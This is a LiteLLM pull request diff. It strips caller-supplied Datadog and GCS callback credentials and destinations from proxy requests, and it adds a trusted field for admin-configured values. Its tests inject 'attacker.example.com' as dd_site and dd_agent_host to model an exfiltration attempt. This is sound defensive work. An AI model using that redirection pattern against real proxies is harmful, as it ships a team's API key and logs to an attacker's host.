### PR TITLE
fix(datadog): read team callback dd_* params from kwargs instead of blocked dynamic params (#35115 port)

### DIFF
--- a/litellm/litellm_core_utils/initialize_dynamic_callback_params.py
+++ b/litellm/litellm_core_utils/initialize_dynamic_callback_params.py
@@ -1,5 +1,4 @@
 from collections.abc import Iterator, Mapping
-from types import MappingProxyType
 from typing import Any
 
 from litellm.types.utils import TRUSTED_CALLBACK_VARS_FIELD, StandardCallbackDynamicParams
@@ -87,22 +86,21 @@ _request_blocked_callback_params = frozenset(
     }
 )
 
-_EMPTY_TRUSTED_CALLBACK_VARS: Mapping[str, str] = MappingProxyType({})
 
-
-def get_trusted_callback_params(kwargs: Mapping[str, Any] | None, *, prefix: str) -> Mapping[str, str]:
+def get_trusted_callback_params(kwargs: Mapping[str, Any] | None) -> tuple[tuple[str, str], ...]:
     """
     Read callback params the proxy itself stamped from admin-configured team/key callback settings.
 
     Request-body values never reach this field: the proxy strips it from client input before
     setting it, so callbacks can consume credentials and destinations here without re-validating.
+
+    Returned as pairs rather than a mapping because the caller keeps this on the Logging object,
+    which the proxy deep-copies; a mappingproxy is not copyable and a dict would be mutable.
     """
     trusted_vars = kwargs.get(TRUSTED_CALLBACK_VARS_FIELD) if kwargs else None
     if not isinstance(trusted_vars, Mapping):
-        return _EMPTY_TRUSTED_CALLBACK_VARS
-    return MappingProxyType(
-        {key: str(value) for key, value in trusted_vars.items() if isinstance(key, str) and key.startswith(prefix)}
-    )
+        return ()
+    return tuple((key, str(value)) for key, value in trusted_vars.items() if isinstance(key, str))
 
 
 def initialize_standard_callback_dynamic_params(

--- a/litellm/litellm_core_utils/initialize_dynamic_callback_params.py
+++ b/litellm/litellm_core_utils/initialize_dynamic_callback_params.py
@@ -1,7 +1,8 @@
-from collections.abc import Iterator
+from collections.abc import Iterator, Mapping
+from types import MappingProxyType
 from typing import Any
 
-from litellm.types.utils import StandardCallbackDynamicParams
+from litellm.types.utils import TRUSTED_CALLBACK_VARS_FIELD, StandardCallbackDynamicParams
 
 _CLIENT_CALLBACK_METADATA_SLOTS: tuple[str, ...] = ("litellm_metadata", "metadata")
 
@@ -75,14 +76,33 @@ _supported_callback_params = [
     "turn_off_message_logging",
 ]
 
-_request_blocked_callback_params = {
-    "gcs_bucket_name",
-    "gcs_path_service_account",
-    "dd_api_key",
-    "dd_site",
-    "dd_agent_host",
-    "dd_agent_port",
-}
+_request_blocked_callback_params = frozenset(
+    {
+        "gcs_bucket_name",
+        "gcs_path_service_account",
+        "dd_api_key",
+        "dd_site",
+        "dd_agent_host",
+        "dd_agent_port",
+    }
+)
+
+_EMPTY_TRUSTED_CALLBACK_VARS: Mapping[str, str] = MappingProxyType({})
+
+
+def get_trusted_callback_params(kwargs: Mapping[str, Any] | None, *, prefix: str) -> Mapping[str, str]:
+    """
+    Read callback params the proxy itself stamped from admin-configured team/key callback settings.
+
+    Request-body values never reach this field: the proxy strips it from client input before
+    setting it, so callbacks can consume credentials and destinations here without re-validating.
+    """
+    trusted_vars = kwargs.get(TRUSTED_CALLBACK_VARS_FIELD) if kwargs else None
+    if not isinstance(trusted_vars, Mapping):
+        return _EMPTY_TRUSTED_CALLBACK_VARS
+    return MappingProxyType(
+        {key: str(value) for key, value in trusted_vars.items() if isinstance(key, str) and key.startswith(prefix)}
+    )
 
 
 def initialize_standard_callback_dynamic_params(

--- a/litellm/litellm_core_utils/litellm_logging.py
+++ b/litellm/litellm_core_utils/litellm_logging.py
@@ -362,6 +362,7 @@ class Logging(LiteLLMLoggingBaseClass):
         self.standard_callback_dynamic_params: StandardCallbackDynamicParams = (
             self.initialize_standard_callback_dynamic_params(kwargs)
         )
+        self._init_kwargs = kwargs
 
         # Process dynamic callbacks (after standard_callback_dynamic_params is initialized,
         # so team-scoped credentials are available for callback initialization)
@@ -459,9 +460,11 @@ class Logging(LiteLLMLoggingBaseClass):
                 # pass only the relevant dynamic params as custom_logger_init_args.
                 _custom_logger_init_args: dict | None = None
                 if callback == "datadog":
-                    _custom_logger_init_args = {
-                        k: v for k, v in self.standard_callback_dynamic_params.items() if k.startswith("dd_")
-                    }
+                    # dd_* params are blocked from standard_callback_dynamic_params
+                    # (request-level security), but team callback_vars in kwargs
+                    # are admin-configured and trusted.
+                    _source_items = self._init_kwargs.items() if self._init_kwargs else ()
+                    _custom_logger_init_args = {k: v for k, v in _source_items if k.startswith("dd_")}
 
                 callback_class = _init_custom_logger_compatible_class(
                     callback,  # type: ignore[arg-type]

--- a/litellm/litellm_core_utils/litellm_logging.py
+++ b/litellm/litellm_core_utils/litellm_logging.py
@@ -10,7 +10,7 @@ import subprocess
 import sys
 import time
 import traceback
-from collections.abc import Callable, Mapping
+from collections.abc import Callable
 from datetime import datetime as dt_object
 from functools import lru_cache
 from typing import (
@@ -365,7 +365,7 @@ class Logging(LiteLLMLoggingBaseClass):
         self.standard_callback_dynamic_params: StandardCallbackDynamicParams = (
             self.initialize_standard_callback_dynamic_params(kwargs)
         )
-        self._trusted_callback_vars: Mapping[str, str] = get_trusted_callback_params(kwargs, prefix="")
+        self._trusted_callback_vars: tuple[tuple[str, str], ...] = get_trusted_callback_params(kwargs)
 
         # Process dynamic callbacks (after standard_callback_dynamic_params is initialized,
         # so team-scoped credentials are available for callback initialization)
@@ -466,9 +466,7 @@ class Logging(LiteLLMLoggingBaseClass):
                     # dd_* params are blocked from standard_callback_dynamic_params
                     # (request-level security); only the proxy-stamped team/key
                     # callback vars are admin-configured and trusted.
-                    _custom_logger_init_args = {
-                        k: v for k, v in self._trusted_callback_vars.items() if k.startswith("dd_")
-                    }
+                    _custom_logger_init_args = {k: v for k, v in self._trusted_callback_vars if k.startswith("dd_")}
 
                 callback_class = _init_custom_logger_compatible_class(
                     callback,  # type: ignore[arg-type]

--- a/litellm/litellm_core_utils/litellm_logging.py
+++ b/litellm/litellm_core_utils/litellm_logging.py
@@ -10,7 +10,7 @@ import subprocess
 import sys
 import time
 import traceback
-from collections.abc import Callable
+from collections.abc import Callable, Mapping
 from datetime import datetime as dt_object
 from functools import lru_cache
 from typing import (
@@ -166,6 +166,9 @@ from ..integrations.s3_v2 import S3Logger as S3V2Logger
 from ..integrations.supabase import Supabase
 from ..integrations.traceloop import TraceloopLogger
 from .exception_mapping_utils import _get_response_headers
+from .initialize_dynamic_callback_params import (
+    get_trusted_callback_params,
+)
 from .initialize_dynamic_callback_params import (
     initialize_standard_callback_dynamic_params as _initialize_standard_callback_dynamic_params,
 )
@@ -362,7 +365,7 @@ class Logging(LiteLLMLoggingBaseClass):
         self.standard_callback_dynamic_params: StandardCallbackDynamicParams = (
             self.initialize_standard_callback_dynamic_params(kwargs)
         )
-        self._init_kwargs = kwargs
+        self._trusted_callback_vars: Mapping[str, str] = get_trusted_callback_params(kwargs, prefix="")
 
         # Process dynamic callbacks (after standard_callback_dynamic_params is initialized,
         # so team-scoped credentials are available for callback initialization)
@@ -461,10 +464,11 @@ class Logging(LiteLLMLoggingBaseClass):
                 _custom_logger_init_args: dict | None = None
                 if callback == "datadog":
                     # dd_* params are blocked from standard_callback_dynamic_params
-                    # (request-level security), but team callback_vars in kwargs
-                    # are admin-configured and trusted.
-                    _source_items = self._init_kwargs.items() if self._init_kwargs else ()
-                    _custom_logger_init_args = {k: v for k, v in _source_items if k.startswith("dd_")}
+                    # (request-level security); only the proxy-stamped team/key
+                    # callback vars are admin-configured and trusted.
+                    _custom_logger_init_args = {
+                        k: v for k, v in self._trusted_callback_vars.items() if k.startswith("dd_")
+                    }
 
                 callback_class = _init_custom_logger_compatible_class(
                     callback,  # type: ignore[arg-type]

--- a/litellm/proxy/litellm_pre_call_utils.py
+++ b/litellm/proxy/litellm_pre_call_utils.py
@@ -4,6 +4,7 @@ import json
 import re
 import time
 from collections import OrderedDict
+from collections.abc import Set as AbstractSet
 from typing import TYPE_CHECKING, Any
 
 from fastapi import HTTPException, Request
@@ -524,7 +525,9 @@ def safe_add_api_version_from_query_params(data: dict, request: Request):
 
 
 def convert_key_logging_metadata_to_callback(
-    data: AddTeamCallback, team_callback_settings_obj: TeamCallbackMetadata | None
+    data: AddTeamCallback,
+    team_callback_settings_obj: TeamCallbackMetadata | None,
+    blocked_vars: AbstractSet[str] = frozenset(),
 ) -> TeamCallbackMetadata:
     if team_callback_settings_obj is None:
         team_callback_settings_obj = TeamCallbackMetadata()
@@ -560,6 +563,8 @@ def convert_key_logging_metadata_to_callback(
             team_callback_settings_obj.callbacks.append(data.callback_name)
 
     for var, value in data.callback_vars.items():
+        if var in blocked_vars:
+            continue
         if team_callback_settings_obj.callback_vars is None:
             team_callback_settings_obj.callback_vars = {}
         team_callback_settings_obj.callback_vars[var] = str(value)
@@ -611,13 +616,21 @@ def _get_dynamic_logging_metadata(
     # Key-based callbacks
     #########################################################################################
     if key_dynamic_logging_settings is not None:
+        from litellm.litellm_core_utils.initialize_dynamic_callback_params import (
+            _request_blocked_callback_params,
+        )
+
         for item in key_dynamic_logging_settings:
             callback = _get_validated_callback_metadata(item=item, source="key-level")
             if callback is None:
                 continue
+            # Strip params that could redirect traffic to attacker-controlled
+            # destinations (e.g. dd_site, dd_agent_host). Key metadata is
+            # user-configurable; only team-level callbacks are admin-trusted.
             callback_settings_obj = convert_key_logging_metadata_to_callback(
                 data=callback,
                 team_callback_settings_obj=callback_settings_obj,
+                blocked_vars=_request_blocked_callback_params,
             )
     #########################################################################################
     # Team-based callbacks

--- a/litellm/proxy/litellm_pre_call_utils.py
+++ b/litellm/proxy/litellm_pre_call_utils.py
@@ -4,7 +4,6 @@ import json
 import re
 import time
 from collections import OrderedDict
-from collections.abc import Set as AbstractSet
 from typing import TYPE_CHECKING, Any
 
 from fastapi import HTTPException, Request
@@ -562,7 +561,6 @@ def safe_add_api_version_from_query_params(data: dict, request: Request):
 def convert_key_logging_metadata_to_callback(
     data: AddTeamCallback,
     team_callback_settings_obj: TeamCallbackMetadata | None,
-    blocked_vars: AbstractSet[str] = frozenset(),
 ) -> TeamCallbackMetadata:
     if team_callback_settings_obj is None:
         team_callback_settings_obj = TeamCallbackMetadata()
@@ -598,8 +596,6 @@ def convert_key_logging_metadata_to_callback(
             team_callback_settings_obj.callbacks.append(data.callback_name)
 
     for var, value in data.callback_vars.items():
-        if var in blocked_vars:
-            continue
         if team_callback_settings_obj.callback_vars is None:
             team_callback_settings_obj.callback_vars = {}
         team_callback_settings_obj.callback_vars[var] = str(value)
@@ -655,13 +651,9 @@ def _get_dynamic_logging_metadata(
             callback = _get_validated_callback_metadata(item=item, source="key-level")
             if callback is None:
                 continue
-            # Strip params that could redirect traffic to attacker-controlled
-            # destinations (e.g. dd_site, dd_agent_host). Key metadata is
-            # user-configurable; only team-level callbacks are admin-trusted.
             callback_settings_obj = convert_key_logging_metadata_to_callback(
                 data=callback,
                 team_callback_settings_obj=callback_settings_obj,
-                blocked_vars=_request_blocked_callback_params,
             )
     #########################################################################################
     # Team-based callbacks

--- a/litellm/proxy/litellm_pre_call_utils.py
+++ b/litellm/proxy/litellm_pre_call_utils.py
@@ -21,6 +21,8 @@ from litellm.constants import (
 )
 from litellm.litellm_core_utils.credential_accessor import CredentialAccessor
 from litellm.litellm_core_utils.initialize_dynamic_callback_params import (
+    TRUSTED_CALLBACK_VARS_FIELD,
+    _request_blocked_callback_params,
     iter_client_callback_metadata_dicts,
 )
 from litellm.litellm_core_utils.safe_json_loads import safe_json_loads
@@ -357,6 +359,39 @@ def _strip_client_message_redaction_opt_out(data: dict[str, Any]) -> None:
         )
 
 
+def _strip_client_callback_credentials(
+    data: dict[str, Any],  # mutable-ok: strips in place on the request body the pre-call pipeline threads through
+) -> None:
+    """Drop callback credentials and destinations supplied by the caller.
+
+    ``_request_blocked_callback_params`` (Datadog + GCS credentials, sites and agent
+    hosts) are already ignored when building ``standard_callback_dynamic_params``.
+    Strip them from the body and every client metadata slot as well, so a caller
+    cannot pair its own ``dd_site``/``dd_agent_host`` with the team's admin-configured
+    ``dd_api_key`` and have the resulting logs shipped to a host it controls.
+
+    ``TRUSTED_CALLBACK_VARS_FIELD`` is proxy-owned; it is cleared here and repopulated
+    from team/key callback settings in ``add_litellm_data_to_request``.
+    """
+    containers = (("body", data), *iter_client_callback_metadata_dicts(data))
+    stripped = tuple(
+        f"{label}.{field}"
+        for label, container in containers
+        for field in _request_blocked_callback_params
+        if field in container
+    )
+    for _, container in containers:
+        for field in _request_blocked_callback_params:
+            container.pop(field, None)
+    data.pop(TRUSTED_CALLBACK_VARS_FIELD, None)
+    if stripped:
+        verbose_proxy_logger.debug(
+            "Stripped client-supplied callback credentials from request: %s. "
+            "Configure these on the team or key callback settings instead.",
+            ", ".join(sorted(stripped)),
+        )
+
+
 def _strip_client_pricing_overrides(data: dict[str, Any]) -> None:
     """Drop pricing overrides from the request body and any metadata variant.
 
@@ -616,10 +651,6 @@ def _get_dynamic_logging_metadata(
     # Key-based callbacks
     #########################################################################################
     if key_dynamic_logging_settings is not None:
-        from litellm.litellm_core_utils.initialize_dynamic_callback_params import (
-            _request_blocked_callback_params,
-        )
-
         for item in key_dynamic_logging_settings:
             callback = _get_validated_callback_metadata(item=item, source="key-level")
             if callback is None:
@@ -1576,6 +1607,10 @@ async def add_litellm_data_to_request(
     if not _key_or_team_allows_client_pricing_override(user_api_key_dict):
         _strip_client_pricing_overrides(data)
 
+    # Same reason as the strips above: runs after the metadata string-to-dict parse
+    # so JSON-string metadata cannot smuggle callback credentials past the dict guard.
+    _strip_client_callback_credentials(data)
+
     if not _allow_client_message_redaction_opt_out and litellm.turn_off_message_logging is True:
         _strip_client_message_redaction_opt_out(data)
 
@@ -1784,6 +1819,9 @@ async def add_litellm_data_to_request(
             # unpack callback_vars in data
             for k, v in callback_settings_obj.callback_vars.items():
                 data[k] = v
+            # Callbacks that must not honour request-supplied credentials read this
+            # proxy-owned field instead of the raw request kwargs.
+            data[TRUSTED_CALLBACK_VARS_FIELD] = callback_settings_obj.callback_vars
 
     # Add disabled callbacks from key metadata
     if user_api_key_dict.metadata and "litellm_disabled_callbacks" in user_api_key_dict.metadata:

--- a/litellm/types/utils.py
+++ b/litellm/types/utils.py
@@ -3286,8 +3286,15 @@ agentic_loop_internal_litellm_params = [
     "_code_interpreter_interception_converted_stream",
 ]
 
+# Proxy-owned callback credentials, stamped from admin-configured team/key callback
+# settings. Listed in all_litellm_params for the same reason as the agentic-loop
+# fields above: an unrecognized top-level key is swept into extra_body and sent to
+# the provider.
+TRUSTED_CALLBACK_VARS_FIELD = "litellm_trusted_callback_vars"
+
 all_litellm_params = (
     agentic_loop_internal_litellm_params
+    + [TRUSTED_CALLBACK_VARS_FIELD]
     + [
         "metadata",
         "litellm_metadata",

--- a/tests/test_litellm/integrations/datadog/test_datadog_team_handler.py
+++ b/tests/test_litellm/integrations/datadog/test_datadog_team_handler.py
@@ -6,6 +6,7 @@ Verifies that DataDogLogger can be instantiated with per-team credentials
 and that the DataDogHandler correctly resolves and caches per-team loggers.
 """
 
+import copy
 from unittest.mock import patch
 
 import pytest
@@ -263,7 +264,7 @@ class TestStandardCallbackDynamicParamsIncludesDatadog:
         assert "dd_agent_port" in annotations
 
 
-def _build_logging_obj(kwargs: dict):
+def _build_logging_obj(kwargs: dict, *, with_datadog_callback: bool = True):
     from litellm.litellm_core_utils.litellm_logging import Logging
 
     with patch("asyncio.create_task"):
@@ -275,7 +276,7 @@ def _build_logging_obj(kwargs: dict):
             start_time="2026-01-01",
             litellm_call_id="test-call-id",
             function_id="test-func",
-            dynamic_success_callbacks=["datadog"],
+            dynamic_success_callbacks=["datadog"] if with_datadog_callback else None,
             kwargs=kwargs,
         )
 
@@ -325,6 +326,19 @@ class TestTeamCallbackFlowPassesDDCredentials:
         assert dd_loggers[0].DD_API_KEY == "global_api_key"
         assert "attacker.example.com" not in dd_loggers[0].intake_url
         assert "us1.datadoghq.com" in dd_loggers[0].intake_url
+
+    def test_logging_object_stays_deepcopyable(self):
+        """The proxy deep-copies request data, and the Logging object rides along in it."""
+        logging_obj = _build_logging_obj(
+            {
+                TRUSTED_CALLBACK_VARS_FIELD: {"dd_api_key": "team-dd-key-123", "dd_site": "us5.datadoghq.com"},
+                "model": "gpt-4",
+                "litellm_params": {"metadata": {}},
+            },
+            with_datadog_callback=False,
+        )
+
+        assert copy.deepcopy(logging_obj)._trusted_callback_vars == logging_obj._trusted_callback_vars
 
     def test_caller_cannot_redirect_team_credentials(self, datadog_env):
         """The exfil shape: caller's dd_site paired with the team's dd_api_key."""

--- a/tests/test_litellm/integrations/datadog/test_datadog_team_handler.py
+++ b/tests/test_litellm/integrations/datadog/test_datadog_team_handler.py
@@ -13,7 +13,6 @@ import pytest
 from litellm.integrations.datadog.datadog import DataDogLogger
 from litellm.integrations.datadog.datadog_team_handler import (
     DataDogHandler,
-    DatadogLoggingConfig,
 )
 from litellm.litellm_core_utils.specialty_caches.dynamic_logging_cache import (
     DynamicLoggingCache,
@@ -94,9 +93,7 @@ class TestDataDogLoggerCredentialKwargs:
         assert logger.DD_API_KEY is None
         assert "attacker.example.com" in logger.intake_url
 
-    def test_direct_api_mode_does_not_leak_env_api_key_when_disallowed(
-        self, datadog_env
-    ):
+    def test_direct_api_mode_does_not_leak_env_api_key_when_disallowed(self, datadog_env):
         """With allow_env_credentials=False and no explicit key, init must fail rather than reuse env key."""
         with pytest.raises(Exception, match="DD_API_KEY"):
             with patch("asyncio.create_task"):
@@ -261,3 +258,49 @@ class TestStandardCallbackDynamicParamsIncludesDatadog:
         assert "dd_site" in annotations
         assert "dd_agent_host" in annotations
         assert "dd_agent_port" in annotations
+
+
+class TestTeamCallbackFlowPassesDDCredentials:
+    """
+    Integration test for the full team callback flow.
+
+    Verifies that DD credentials configured via team callback_vars
+    actually reach DataDogHandler when a request is processed.
+    The dd_* params are in _request_blocked_callback_params (to prevent
+    request-level injection), but team callback_vars are admin-configured
+    and must pass through.
+    """
+
+    def test_process_dynamic_callbacks_passes_dd_params_from_kwargs(self):
+        """
+        Simulates the Logging.__init__ flow where team callback_vars
+        (dd_api_key, dd_site) are unpacked into kwargs. Verifies that
+        _process_dynamic_callback_list picks them up and passes them
+        to DataDogHandler despite _request_blocked_callback_params.
+        """
+        from litellm.litellm_core_utils.litellm_logging import Logging
+
+        kwargs = {
+            "dd_api_key": "team-dd-key-123",
+            "dd_site": "us5.datadoghq.com",
+            "model": "gpt-4",
+            "litellm_params": {"metadata": {}},
+        }
+
+        with patch("asyncio.create_task"):
+            logging_obj = Logging(
+                model="gpt-4",
+                messages=[{"role": "user", "content": "hi"}],
+                stream=False,
+                call_type="completion",
+                start_time="2026-01-01",
+                litellm_call_id="test-call-id",
+                function_id="test-func",
+                dynamic_success_callbacks=["datadog"],
+                kwargs=kwargs,
+            )
+
+        dd_loggers = [cb for cb in (logging_obj.dynamic_success_callbacks or []) if isinstance(cb, DataDogLogger)]
+        assert len(dd_loggers) == 1, "DataDogLogger should be initialized from team callback_vars"
+        assert dd_loggers[0].DD_API_KEY == "team-dd-key-123"
+        assert "us5.datadoghq.com" in dd_loggers[0].intake_url

--- a/tests/test_litellm/integrations/datadog/test_datadog_team_handler.py
+++ b/tests/test_litellm/integrations/datadog/test_datadog_team_handler.py
@@ -14,6 +14,9 @@ from litellm.integrations.datadog.datadog import DataDogLogger
 from litellm.integrations.datadog.datadog_team_handler import (
     DataDogHandler,
 )
+from litellm.litellm_core_utils.initialize_dynamic_callback_params import (
+    TRUSTED_CALLBACK_VARS_FIELD,
+)
 from litellm.litellm_core_utils.specialty_caches.dynamic_logging_cache import (
     DynamicLoggingCache,
 )
@@ -260,47 +263,81 @@ class TestStandardCallbackDynamicParamsIncludesDatadog:
         assert "dd_agent_port" in annotations
 
 
+def _build_logging_obj(kwargs: dict):
+    from litellm.litellm_core_utils.litellm_logging import Logging
+
+    with patch("asyncio.create_task"):
+        return Logging(
+            model="gpt-4",
+            messages=[{"role": "user", "content": "hi"}],
+            stream=False,
+            call_type="completion",
+            start_time="2026-01-01",
+            litellm_call_id="test-call-id",
+            function_id="test-func",
+            dynamic_success_callbacks=["datadog"],
+            kwargs=kwargs,
+        )
+
+
+def _dd_loggers(logging_obj) -> list[DataDogLogger]:
+    return [cb for cb in (logging_obj.dynamic_success_callbacks or []) if isinstance(cb, DataDogLogger)]
+
+
 class TestTeamCallbackFlowPassesDDCredentials:
     """
-    Integration test for the full team callback flow.
+    dd_* credentials reach DataDogHandler only from the proxy-stamped trusted field.
 
-    Verifies that DD credentials configured via team callback_vars
-    actually reach DataDogHandler when a request is processed.
-    The dd_* params are in _request_blocked_callback_params (to prevent
-    request-level injection), but team callback_vars are admin-configured
-    and must pass through.
+    Team callback_vars are admin-configured, so they must survive
+    _request_blocked_callback_params; anything the caller put in the request body
+    must not, or a caller could pair its own dd_site with the team's dd_api_key.
     """
 
-    def test_process_dynamic_callbacks_passes_dd_params_from_kwargs(self):
-        """
-        Simulates the Logging.__init__ flow where team callback_vars
-        (dd_api_key, dd_site) are unpacked into kwargs. Verifies that
-        _process_dynamic_callback_list picks them up and passes them
-        to DataDogHandler despite _request_blocked_callback_params.
-        """
-        from litellm.litellm_core_utils.litellm_logging import Logging
+    def test_trusted_callback_vars_reach_datadog_handler(self, datadog_env):
+        trusted_vars = {"dd_api_key": "team-dd-key-123", "dd_site": "us5.datadoghq.com"}
+        logging_obj = _build_logging_obj(
+            {
+                TRUSTED_CALLBACK_VARS_FIELD: trusted_vars,
+                "model": "gpt-4",
+                "litellm_params": {"metadata": {}},
+            }
+        )
 
-        kwargs = {
-            "dd_api_key": "team-dd-key-123",
-            "dd_site": "us5.datadoghq.com",
-            "model": "gpt-4",
-            "litellm_params": {"metadata": {}},
-        }
-
-        with patch("asyncio.create_task"):
-            logging_obj = Logging(
-                model="gpt-4",
-                messages=[{"role": "user", "content": "hi"}],
-                stream=False,
-                call_type="completion",
-                start_time="2026-01-01",
-                litellm_call_id="test-call-id",
-                function_id="test-func",
-                dynamic_success_callbacks=["datadog"],
-                kwargs=kwargs,
-            )
-
-        dd_loggers = [cb for cb in (logging_obj.dynamic_success_callbacks or []) if isinstance(cb, DataDogLogger)]
+        dd_loggers = _dd_loggers(logging_obj)
         assert len(dd_loggers) == 1, "DataDogLogger should be initialized from team callback_vars"
         assert dd_loggers[0].DD_API_KEY == "team-dd-key-123"
         assert "us5.datadoghq.com" in dd_loggers[0].intake_url
+
+    def test_request_kwargs_dd_params_are_ignored(self, datadog_env):
+        """Top-level dd_* in the call kwargs are caller-controlled and must never be honoured."""
+        logging_obj = _build_logging_obj(
+            {
+                "dd_api_key": "caller-dd-key",
+                "dd_site": "attacker.example.com",
+                "dd_agent_host": "attacker.example.com",
+                "model": "gpt-4",
+                "litellm_params": {"metadata": {}},
+            }
+        )
+
+        dd_loggers = _dd_loggers(logging_obj)
+        assert len(dd_loggers) == 1
+        assert dd_loggers[0].DD_API_KEY == "global_api_key"
+        assert "attacker.example.com" not in dd_loggers[0].intake_url
+        assert "us1.datadoghq.com" in dd_loggers[0].intake_url
+
+    def test_caller_cannot_redirect_team_credentials(self, datadog_env):
+        """The exfil shape: caller's dd_site paired with the team's dd_api_key."""
+        logging_obj = _build_logging_obj(
+            {
+                TRUSTED_CALLBACK_VARS_FIELD: {"dd_api_key": "team-dd-key-123"},
+                "dd_site": "attacker.example.com",
+                "model": "gpt-4",
+                "litellm_params": {"metadata": {}},
+            }
+        )
+
+        dd_loggers = _dd_loggers(logging_obj)
+        assert len(dd_loggers) == 1
+        assert dd_loggers[0].DD_API_KEY == "team-dd-key-123"
+        assert "attacker.example.com" not in dd_loggers[0].intake_url

--- a/tests/test_litellm/proxy/test_litellm_pre_call_utils.py
+++ b/tests/test_litellm/proxy/test_litellm_pre_call_utils.py
@@ -5686,3 +5686,40 @@ def test_trusted_callback_vars_never_reach_the_provider():
 
     assert TRUSTED_CALLBACK_VARS_FIELD not in non_default
     assert non_default["some_provider_param"] == "kept"
+
+
+@pytest.mark.asyncio
+async def test_key_level_callback_vars_survive_the_strip():
+    """
+    Key-level callbacks configure their own destination and credentials, and they replace
+    team settings rather than merging with them, so only the request body is untrusted.
+    """
+    key_with_datadog_callback = UserAPIKeyAuth(
+        api_key="hashed-key",
+        metadata={
+            "logging": [
+                {
+                    "callback_name": "datadog",
+                    "callback_type": "success",
+                    "callback_vars": {"dd_api_key": "key-dd-key", "dd_site": "us5.datadoghq.com"},
+                }
+            ]
+        },
+    )
+    data = {
+        "model": "gpt-3.5-turbo",
+        "messages": [{"role": "user", "content": "hello"}],
+        "dd_site": "attacker.example.com",
+    }
+
+    updated = await add_litellm_data_to_request(
+        data=data,
+        request=_callback_credential_request_mock(),
+        user_api_key_dict=key_with_datadog_callback,
+        proxy_config=MagicMock(),
+        general_settings={},
+        version="test-version",
+    )
+
+    assert updated[TRUSTED_CALLBACK_VARS_FIELD] == {"dd_api_key": "key-dd-key", "dd_site": "us5.datadoghq.com"}
+    assert updated["dd_site"] == "us5.datadoghq.com"

--- a/tests/test_litellm/proxy/test_litellm_pre_call_utils.py
+++ b/tests/test_litellm/proxy/test_litellm_pre_call_utils.py
@@ -28,6 +28,9 @@ from litellm.proxy.litellm_pre_call_utils import (
     check_if_token_is_service_account,
     clean_headers,
 )
+from litellm.litellm_core_utils.initialize_dynamic_callback_params import (
+    TRUSTED_CALLBACK_VARS_FIELD,
+)
 from litellm.types.utils import CredentialItem
 
 sys.path.insert(
@@ -5554,3 +5557,132 @@ def test_warn_stale_team_alias_once_evicts_oldest_key_beyond_cap(monkeypatch):
         pre_call_utils._warn_stale_team_alias_once("key-3", "stale alias")
 
     assert list(pre_call_utils._STALE_TEAM_ALIAS_WARNING_KEYS) == ["key-2", "key-3"]
+
+
+def _callback_credential_request_mock() -> MagicMock:
+    request_mock = MagicMock(spec=Request)
+    request_mock.url = MagicMock()
+    request_mock.url.path = "/v1/chat/completions"
+    request_mock.url.__str__.return_value = "http://localhost/v1/chat/completions"
+    request_mock.method = "POST"
+    request_mock.query_params = {}
+    request_mock.headers = {"Content-Type": "application/json"}
+    request_mock.client = MagicMock()
+    request_mock.client.host = "127.0.0.1"
+    return request_mock
+
+
+_DATADOG_TEAM_KEY = UserAPIKeyAuth(
+    api_key="hashed-key",
+    team_id="team-1",
+    team_metadata={
+        "logging": [
+            {
+                "callback_name": "datadog",
+                "callback_type": "success",
+                "callback_vars": {"dd_api_key": "team-dd-key"},
+            }
+        ]
+    },
+)
+
+
+@pytest.mark.asyncio
+async def test_add_litellm_data_to_request_strips_caller_supplied_callback_credentials():
+    """
+    The team admin sets dd_api_key only; a caller pairing its own dd_site with that key
+    would ship the team's Datadog credential to a host it controls.
+    """
+    caller_destinations = {"dd_site": "attacker.example.com", "dd_agent_host": "attacker.example.com"}
+    data = {
+        "model": "gpt-3.5-turbo",
+        "messages": [{"role": "user", "content": "hello"}],
+        **caller_destinations,
+        "gcs_bucket_name": "attacker-bucket",
+        TRUSTED_CALLBACK_VARS_FIELD: {"dd_site": "smuggled.example.com"},
+        "metadata": {**caller_destinations, "safe_user_metadata": "kept"},
+        "litellm_metadata": dict(caller_destinations),
+        "litellm_params": {"metadata": dict(caller_destinations)},
+    }
+
+    updated = await add_litellm_data_to_request(
+        data=data,
+        request=_callback_credential_request_mock(),
+        user_api_key_dict=_DATADOG_TEAM_KEY,
+        proxy_config=MagicMock(),
+        general_settings={},
+        version="test-version",
+    )
+
+    assert "dd_site" not in updated
+    assert "dd_agent_host" not in updated
+    assert "gcs_bucket_name" not in updated
+    assert updated["dd_api_key"] == "team-dd-key"
+    assert updated[TRUSTED_CALLBACK_VARS_FIELD] == {"dd_api_key": "team-dd-key"}
+    for metadata_key in ("metadata", "litellm_metadata"):
+        assert "dd_site" not in updated[metadata_key]
+        assert "dd_agent_host" not in updated[metadata_key]
+    assert "dd_site" not in updated["litellm_params"]["metadata"]
+    assert updated["metadata"]["safe_user_metadata"] == "kept"
+
+
+@pytest.mark.asyncio
+async def test_add_litellm_data_to_request_strips_caller_supplied_callback_credentials_with_clientside_creds_allowed():
+    """`allow_client_side_credentials` opens the auth-layer ban; the strip must still hold."""
+    data = {
+        "model": "gpt-3.5-turbo",
+        "messages": [{"role": "user", "content": "hello"}],
+        "dd_site": "attacker.example.com",
+    }
+
+    updated = await add_litellm_data_to_request(
+        data=data,
+        request=_callback_credential_request_mock(),
+        user_api_key_dict=_DATADOG_TEAM_KEY,
+        proxy_config=MagicMock(),
+        general_settings={"allow_client_side_credentials": True},
+        version="test-version",
+    )
+
+    assert "dd_site" not in updated
+    assert updated[TRUSTED_CALLBACK_VARS_FIELD] == {"dd_api_key": "team-dd-key"}
+
+
+@pytest.mark.asyncio
+async def test_add_litellm_data_to_request_omits_trusted_callback_vars_without_team_callbacks():
+    """Without team/key callback settings the trusted field must not exist for a callback to read."""
+    data = {
+        "model": "gpt-3.5-turbo",
+        "messages": [{"role": "user", "content": "hello"}],
+        TRUSTED_CALLBACK_VARS_FIELD: {"dd_api_key": "caller-key", "dd_site": "attacker.example.com"},
+    }
+
+    updated = await add_litellm_data_to_request(
+        data=data,
+        request=_callback_credential_request_mock(),
+        user_api_key_dict=UserAPIKeyAuth(api_key="hashed-key"),
+        proxy_config=MagicMock(),
+        general_settings={},
+        version="test-version",
+    )
+
+    assert TRUSTED_CALLBACK_VARS_FIELD not in updated
+
+
+def test_trusted_callback_vars_never_reach_the_provider():
+    """
+    The stamped field rides the request body, so it has to be a recognised litellm param;
+    otherwise the OpenAI param builder sweeps it into extra_body and the provider 400s.
+    """
+    from litellm.utils import get_non_default_completion_params
+
+    non_default = get_non_default_completion_params(
+        {
+            "model": "gpt-4",
+            TRUSTED_CALLBACK_VARS_FIELD: {"dd_api_key": "team-dd-key"},
+            "some_provider_param": "kept",
+        }
+    )
+
